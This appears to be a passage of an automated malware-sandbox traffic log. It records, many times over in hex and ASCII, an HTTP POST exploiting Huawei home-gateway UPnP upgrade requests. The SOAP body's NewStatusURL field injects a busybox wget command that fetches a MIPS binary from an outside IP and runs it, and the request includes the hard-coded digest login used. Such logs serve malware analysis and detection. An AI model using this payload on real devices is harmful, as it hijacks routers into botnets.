xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 